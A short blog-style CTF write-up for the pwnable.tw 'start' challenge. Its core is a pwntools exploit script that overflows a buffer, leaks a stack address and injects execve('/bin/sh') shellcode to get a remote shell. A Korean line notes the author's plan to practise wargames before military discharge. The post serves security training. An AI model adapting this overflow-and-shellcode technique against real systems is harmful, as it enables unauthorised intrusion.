[pwnable.tw] start

from pwn import *

context.lo_level = "debug"

p = remote("chall.pwnable.tw", 10000)
#p = process("./start")

ret = 0x0804809c
main = 0x08048087 


leak = b"A" * 0x14
leak += p32(main)
#leak += p32(ret)

p.recvuntil(b":")
p.send(leak)
sleep(0.1)
shell_addr = u32(p.recv(4))
log.info("shell code addr: " + hex(shell_addr))


shell = b"\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x89\xc2\xb0\x0b\xcd\x80"


payload = b"A" * 0x14
payload += p32(shell_addr + 0x14)
payload += shell

sleep(1)
p.send(payload)

p.interactive()

 

 

 

 

전역도 2달인가 남아서 복학하면 워겜은 많이 안할것 같아서 전역하기 전까지 tw 열심히(?) 풀어볼까합니다